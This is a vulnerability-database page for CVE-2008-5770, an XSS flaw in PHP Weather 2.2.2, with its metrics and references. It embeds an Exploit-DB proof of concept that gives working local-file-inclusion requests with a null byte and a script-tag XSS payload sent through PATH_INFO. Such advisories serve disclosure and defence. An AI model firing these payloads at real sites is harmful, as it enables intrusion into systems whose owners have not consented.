CVE-2008-5770 : Detail

CVE-2008-5770

Cross-site Scripting
A03-Injection
1.88%V4
Network
2008-12-30
19h00 +00:00
2017-09-28
10h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Cross-site scripting (XSS) vulnerability in config/make_config.php in PHP Weather 2.2.2 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.

Metrics

Metrics Score Severity CVSS Vector Source
V2 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 7451

Publication date : 2008-12-13 23h00 +00:00
Author : ahmadbady
EDB Verified : Yes

****(Lfi/xss)**** script: phpweather-2.2.2 *************************************************************************** download from:http://downloads.sourceforge.net/phpweather/phpweather-2.2.2.zip?modtime=1087430400&big_mirror=0 *************************************************************************** vul: /test.php line 48: require(PHPWEATHER_BASE_DIR . "/output/pw_text_$language.php"); *************************************************** xpl: www.site.com/path/test.php?metar=()&language=[Lfi]%00 ..................................................... www.site.com/path/index.php?cc=[Lfi] .................................................... xss: www.site.com/path/config/make_config.php/>"><ScRiPt>alert(0)</ScRiPt> .................................................. Author: ahmadbady from:iran *************************************************** # milw0rm.com [2008-12-14]

Products Mentioned

Configuraton 0

Phpweather>>Phpweather >> Version 2.2.2

    References

    http://securityreason.com/securityalert/4826
    Tags : third-party-advisory, x_refsource_SREASON
    http://www.securityfocus.com/bid/32820
    Tags : vdb-entry, x_refsource_BID
    http://secunia.com/advisories/33098
    Tags : third-party-advisory, x_refsource_SECUNIA
    https://www.exploit-db.com/exploits/7451
    Tags : exploit, x_refsource_EXPLOIT-DB